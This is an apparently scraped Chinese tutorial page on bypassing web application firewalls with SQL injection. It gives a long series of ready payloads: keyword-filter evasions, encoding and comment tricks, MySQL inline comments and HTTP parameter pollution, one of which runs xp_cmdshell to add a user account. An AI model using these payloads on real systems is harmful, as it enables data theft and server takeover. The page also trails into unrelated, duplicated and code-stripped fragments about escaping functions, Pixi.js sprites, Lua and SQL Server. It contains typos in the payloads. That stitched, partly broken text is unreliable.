一、 绕过waf思路
从第一步起,一点一点去分析,然后绕过。
1、过滤 and,or
preg_match('/(and|or)/i', $id) Filtered injection: 1 or 1 = 1 1 and 1 = 1 Bypassed injection: 1 || 1 = 1 1 && 1 = 1
2、过滤 and, or, union
preg_match('/(and|or|union)/i', $id) Filtered injection: union select user, password from users Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin'
3、过滤 and, or, union, where
preg_match('/(and|or|union|where)/i', $id) Filtered injection: 1 || (select user from users where user_id = 1) = 'admin' Bypassed injection: 1 || (select user from users limit 1) = 'admin'
4、过滤 and, or, union, where, limit
preg_match('/(and|or|union|where|limit)/i', $id) Filtered injection: 1 || (select user from users limit 1) = 'admin' Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
5、过滤 and, or, union, where, limit, group by
preg_match('/(and|or|union|where|limit|group by)/i', $id) Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin' Bypassed injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1
6、过滤 and, or, union, where, limit, group by, select
preg_match('/(and|or|union|where|limit|group by|select)/i', $id) Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1 Bypassed injection: 1 || 1 = 1 into outfile 'result.txt' Bypassed injection: 1 || substr(user,1,1) = 'a'
7、过滤 and, or, union, where, limit, group by, select, ‘
preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id) Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1 Bypassed injection: 1 || user_id is not null Bypassed injection: 1 || substr(user,1,1) = 0x61 Bypassed injection: 1 || substr(user,1,1) = unhex(61)
8、过滤 and, or, union, where, limit, group by, select, ‘, hex
preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id) Filtered injection: 1 || substr(user,1,1) = unhex(61) Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
9、过滤 and, or, union, where, limit, group by, select, ‘, hex, substr
preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id) Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36)) Bypassed injection: 1 || lpad(user,7,1)
10、过滤 and, or, union, where, limit, group by, select, ‘, hex, substr, 空格
preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id) Filtered injection: 1 || lpad(user,7,1) ypassed injection: 1%0b||%0blpad(user,7,1)
二、正则绕过
根据正则的的模糊匹配特性绕过,比如过滤了'='
filtered injection: 1 or 1 = 1
Bypassed injection: 1 or 1,1 or ‘1',1 or char(97)
eg: filtered injection: 1 union select 1, table_name from information_schema.tables where table_name = 'users' Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z' Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122) Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a Bypassed Injection: 1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273
三、通用绕过
1.注释符
?id=1+un//ion+se//lect+1,2,3–
2.大小写
?id=1+UnIoN//SeLecT//1,2,3–
3.关键字替换
有些waf等使用preg_replace替换了SQL关键字
?id=1+UNunionION+SEselectLECT+1,2,3-- ?id=1+uni%0bon+se%0blect+1,2,3--
有时候注释符'/**/‘可能被过滤,也可以使用%0b绕过
Forbidden: http://localhost/id/1/**/||/**/lpad(first_name,7,1).html Bypassed : http://localhost/id/1%0b||%0blpad(first_name,7,1).html
4.编码
一个经典的脚本:Nukesentinel.php
// Check for UNION attack // Copyright 2004(c) Raven PHP Scripts $blocker_row = $blocker_array[1]; if($blocker_row['activate'] > 0) { if (stristr($nsnst_const['query_string'],'+union+') OR \ stristr($nsnst_const['query_string'],'%20union%20') OR \ stristr($nsnst_const['query_string'],'*/union/*') OR \ stristr($nsnst_const['query_string'],' union ') OR \ stristr($nsnst_const['query_string_base64'],'+union+') OR \ stristr($nsnst_const['query_string_base64'],'%20union%20') OR \ stristr($nsnst_const['query_string_base64'],'*/union/*') OR \ stristr($nsnst_const['query_string_base64'],' union ')) { // block_ip($blocker_row); die("BLOCK IP 1 " ); } }
Forbidden: http://localhost/php/?/**/union/**/select Bypassed : http://localhost/php/?/%2A%2A/union/%2A%2A/select Bypassed : http://localhost/php/?%2f**%2funion%2f**%2fselect
5.缓冲区溢出
http://localhost/news.php?id=1+and+(select 1)=(select 0xA*1000)+union+select+1,2,version(),database(),user(),6,7,8,9,10–
6.内联注释(mysql)
http://localhost/news.php?id=1/*!UnIoN*/SeLecT+1,2,3-- http://localhost/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
四、高级绕过
1.HPP(http参数污染)
举个例子:
index.php?par1=val1&par1=val2 | web server | par1 | | :— | :— | | ASP.NET/IIS | val1,val2 | | ASP/IIS | val1,val2 | | PHP/Apache | val2 | | JSP/Tomcat | val1 |
eg:
在ASP/ASP.NET的环境下
Forbidden: http://localhost/search.aspx?q=select name,password from users Bypassed : http://localhost/search.aspx?q=select name&q=password from users Bypassed : http://localhost/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users Bypassed : http://localhost/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ net user test test /*&id=1*/ --
2.HPC(http参数污染)
RFC2396定义了如下一些字符:
Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' () Reserved : ; / ? : @ & = + $ , Unwise : { } | \ ^ [ ] `
| Query String | Apache/2.2.16,PHP/5.3.3 | IIS6/ASP | | :— | :— | :— | | ?test[1=2 | test_1=2 | test[1=2 | | ?test=% | test=% | test= | | ?test%00=1 | test= | test=1 | | ?test=1%001 | NULL | test=1 | | ?test+d=1+2 | test_d=1 2 | test d=1 2 |
eg:
Forbidden: http://localhost/?xp_cmdshell Bypassed : http://localhost/?xp[cmdshell Forbidden: http://localhost/test.asp?file=../flag.txt Bypassed : http://localhost/test.asp?file=.%./flag.txt Forbidden: http://localhost/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables) Bypassed : http://localhost/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)
总结
以上就是关于sql注入绕过的技巧总结,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对小牛知识库的支持。
问题内容: 即使在使用函数时,也有可能注入SQL吗? 考虑此示例情况。SQL是用PHP构造的,如下所示: 我听到很多人对我说,这样的代码仍然很危险,即使使用了函数也可能被黑。但是我想不出任何可能的利用方式? 像这样的经典注射: 不工作。 您是否知道上面的PHP代码会进行任何可能的注入? 问题答案: 考虑以下查询: 不会保护您免受此侵害。 在查询中的变量周围 使用单引号()的事实可以防止这种情况的发
问题内容: 即使使用函数,是否存在SQL注入的可能性? 考虑这种示例情况。SQL是用PHP构造的,如下所示: 我听到很多人对我说,这样的代码仍然很危险,即使使用了函数也可能被黑。但是我想不出任何可能的利用方式? 像这样的经典注射: 不工作。 您是否知道上面的PHP代码会进行任何可能的注入? 问题答案: 考虑以下查询: 不会保护您免受此侵害。 您可以在查询中的变量周围使用单引号()来防止这种情况。以
一些关于精灵的其他知识 目前为止你已经学会了如何用相当多有用的精灵的属性,像x, y, visible, 和 rotation ,它们让你能够让你很大程度上控制精灵的位置和外观。但是Pixi精灵也有其他很多有用的属性可以使用。 这是一个完整的列表 Pixi的类继承体系是怎么工作的呢?(什么是 类 , 什么是 继承?点击这个链接了解.)Pixi的精灵遵循以下原型链构建了一个继承模型: Display
本文向大家介绍SQL注入绕过的技巧总结,包括了SQL注入绕过的技巧总结的使用技巧和注意事项,需要的朋友参考一下 前言 sql注入在很早很早以前是很常见的一个漏洞。后来随着安全水平的提高,sql注入已经很少能够看到了。但是就在今天,还有很多网站带着sql注入漏洞在运行。稍微有点安全意识的朋友就应该懂得要做一下sql注入过滤。 SQL注入的绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过
本文向大家介绍Lua中关于元方法的一些知识点小结,包括了Lua中关于元方法的一些知识点小结的使用技巧和注意事项,需要的朋友参考一下 本篇要介绍的东西比较零散,都是一些小知识点,所以就放在一起了。 1.两个具有不同元表的值进行算术操作(比如加法) 之前举例的时候,两个table相加,这两个table都是具有相同的元表的,所以没有任何问题。 那么,如果两个table或者两个进行相加操作的值,具有不同的
本文向大家介绍Sql Server的一些知识点定义总结,包括了Sql Server的一些知识点定义总结的使用技巧和注意事项,需要的朋友参考一下 数据库完整性:是指数据库中数据在逻辑上的一致性、正确性、有效性和相容性 实体完整性(Entity Integrity 行完整性):实体完整性指表中行的完整性。主要用于保证操作的数据(记录)非空、唯一且不重复。即实体完整性要求每个关系(表)有且仅有一个主